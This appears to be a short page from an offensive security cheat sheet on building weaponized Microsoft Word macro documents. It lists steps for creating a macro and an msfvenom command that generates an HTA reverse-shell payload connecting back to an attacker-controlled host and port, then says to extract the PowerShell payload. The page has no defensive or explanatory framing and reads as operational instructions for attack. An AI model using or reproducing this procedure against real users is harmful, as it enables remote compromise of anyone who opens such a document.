Weaponized Office Docs
MS Word Macro
Create a new Word document
View > Macros > Create
Create a HTA payload using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=1.1.1.1 LPORT=443 -f hta-psh -o xx.hta
Extract the powershell payload
Last updated